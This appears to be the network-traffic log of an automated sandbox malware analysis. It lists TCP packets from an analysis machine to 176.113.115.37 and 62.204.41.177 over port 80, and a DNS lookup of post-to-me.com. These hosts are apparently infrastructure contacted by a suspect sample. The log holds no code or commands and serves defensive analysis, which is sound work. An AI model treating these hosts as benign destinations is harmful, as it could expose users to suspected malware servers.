                                                                                Oct 26, 2024 19:08:24.102339983 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.102350950 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.102358103 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.102396011 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.102996111 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.103051901 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.103085041 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.103142023 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.103171110 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.103183985 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.103214979 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.103246927 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.103259087 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.103274107 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.103285074 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.103307962 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.103998899 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.104012966 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.104022980 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.104038000 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.104057074 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.104068995 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.126523972 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.126562119 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.126599073 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.126658916 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.126697063 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.220309019 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.220366001 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.220401049 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.220433950 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.220468998 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.220535040 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.220551968 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.220551968 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.220551968 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.220551968 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.220588923 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.220602036 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.220637083 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.220637083 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.220674038 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.220690966 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.220710993 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.220732927 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.220745087 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.220758915 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.220779896 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.220794916 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.220814943 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.220834970 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.220849037 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.220861912 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.220885992 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.220901012 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.220922947 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.220943928 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.220969915 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.246350050 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.246396065 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.246432066 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.246471882 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.246531963 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.339745045 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.339867115 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.339915037 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.339926958 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.339940071 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.339952946 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.339956999 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.339963913 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.339977026 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.339987993 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.339982033 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.340017080 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.340044975 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.340102911 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.340121984 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.340138912 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.340142012 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.340153933 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.340167046 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.340167046 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.340184927 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.340205908 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.340209961 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.340209961 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.340219975 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.340235949 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.340245962 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.340246916 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.340285063 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.340285063 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.365837097 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.365859032 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.365869999 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.365917921 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.365957022 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.459508896 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.459707975 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.459737062 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.459745884 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.459781885 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.459810019 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.459810019 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.459817886 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.459841013 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.459851027 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.459873915 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.459892035 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.459896088 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.459940910 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.459945917 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.459981918 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.459999084 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.460015059 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.460042953 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.460053921 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.460067987 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.460091114 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.460103035 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.460144043 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:24.460200071 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.460232973 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:24.460247040 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.367156029 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.367167950 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.367202044 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.367207050 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.367237091 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.367254972 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.367285013 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.409687996 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.409725904 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.409760952 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.409816980 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.409878016 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.417042971 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.417078972 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.417113066 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.417149067 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.417208910 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.417918921 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.417953968 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.417985916 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.417989016 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.418021917 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.418044090 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.418486118 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.418520927 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.418550014 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.418556929 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.418585062 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.418606997 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.444108009 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.444148064 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.444186926 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.444227934 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.444258928 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.486912966 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.486980915 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.487015963 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.487158060 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.529441118 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.529463053 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.529476881 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.529561043 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.536664963 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.536688089 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.536704063 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.536735058 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.536773920 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.537566900 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.537580013 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.537590981 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.537627935 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.537651062 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.538021088 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.538033962 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.538044930 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.538080931 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.538110971 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.563994884 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.564048052 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.564083099 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.564163923 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.564163923 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.564163923 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.606520891 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.606554985 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.606591940 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.606626987 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.606635094 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.606646061 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.606662989 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.606695890 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.606699944 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.606728077 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.606755018 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.649280071 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.649317980 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.649353027 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.649401903 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.649429083 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.656505108 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.656563997 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.656599998 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.656619072 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.656671047 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.657392025 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.657426119 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.657457113 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.657460928 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.657491922 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.657511950 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.657742977 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.657778025 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.657799959 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.657823086 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.657833099 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.657881021 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.684156895 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.684190035 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.684225082 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.684258938 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.684264898 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.684289932 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.684334993 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.726094007 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.726109028 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.726124048 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.726151943 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.726169109 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.726180077 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.726186037 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.726238012 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.769145012 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.769184113 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.769285917 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.776011944 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.776050091 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.776087999 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.776112080 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.776176929 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.776868105 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.776926994 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.776938915 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.776957989 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.776976109 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.777008057 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.777013063 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.777066946 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.777259111 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.777290106 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.777312040 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.777343035 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.777362108 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.777404070 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.777405977 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.777451038 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.803280115 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.803342104 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.803376913 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.803416014 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.803618908 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.846029043 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.846046925 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.846071959 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.846095085 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.846103907 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.846112013 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.846128941 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.846137047 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.846147060 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.846164942 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.846177101 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.846209049 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.846235991 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.895674944 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.895751953 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.895776987 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.895812988 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.895831108 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.895868063 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.896589041 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.896624088 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.896652937 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.896658897 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.896673918 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.896708012 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.897440910 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.897476912 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.897495985 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.897524118 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:29.063585997 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:29.063699007 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:31.546711922 CEST4973280192.168.2.462.204.41.177
                                                                                Oct 26, 2024 19:08:31.552108049 CEST804973262.204.41.177192.168.2.4
                                                                                Oct 26, 2024 19:08:31.552211046 CEST4973280192.168.2.462.204.41.177
                                                                                Oct 26, 2024 19:08:31.552400112 CEST4973280192.168.2.462.204.41.177
                                                                                Oct 26, 2024 19:08:31.557760000 CEST804973262.204.41.177192.168.2.4
                                                                                Oct 26, 2024 19:08:32.470412970 CEST804973262.204.41.177192.168.2.4
                                                                                Oct 26, 2024 19:08:32.470582962 CEST4973280192.168.2.462.204.41.177
                                                                                Oct 26, 2024 19:08:33.125067949 CEST4973280192.168.2.462.204.41.177
                                                                                Oct 26, 2024 19:08:33.130515099 CEST804973262.204.41.177192.168.2.4
                                                                                Oct 26, 2024 19:08:34.605154991 CEST804973262.204.41.177192.168.2.4
                                                                                Oct 26, 2024 19:08:34.605218887 CEST4973280192.168.2.462.204.41.177
                                                                                Oct 26, 2024 19:08:39.612977028 CEST804973262.204.41.177192.168.2.4
                                                                                Oct 26, 2024 19:08:39.613060951 CEST4973280192.168.2.462.204.41.177
                                                                                Oct 26, 2024 19:10:10.394578934 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:10:10.706887960 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:10:11.316261053 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:10:12.522746086 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:10:15.003825903 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:10:19.816376925 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:10:20.878247976 CEST4973280192.168.2.462.204.41.177
                                                                                Oct 26, 2024 19:10:29.425718069 CEST4973180192.168.2.4176.113.115.37
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 26, 2024 19:08:20.446134090 CEST | 59807 | 53 | 192.168.2.4 | 1.1.1.1
Oct 26, 2024 19:08:20.481583118 CEST | 53 | 59807 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 26, 2024 19:08:20.446134090 CEST | 192.168.2.4 | 1.1.1.1 | 0x7c41 | Standard query (0) | post-to-me.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 26, 2024 19:08:20.481583118 CEST | 1.1.1.1 | 192.168.2.4 | 0x7c41 | No error (0) | post-to-me.com | (none) | 104.21.56.70 | A (IP address) | IN (0x0001) | false
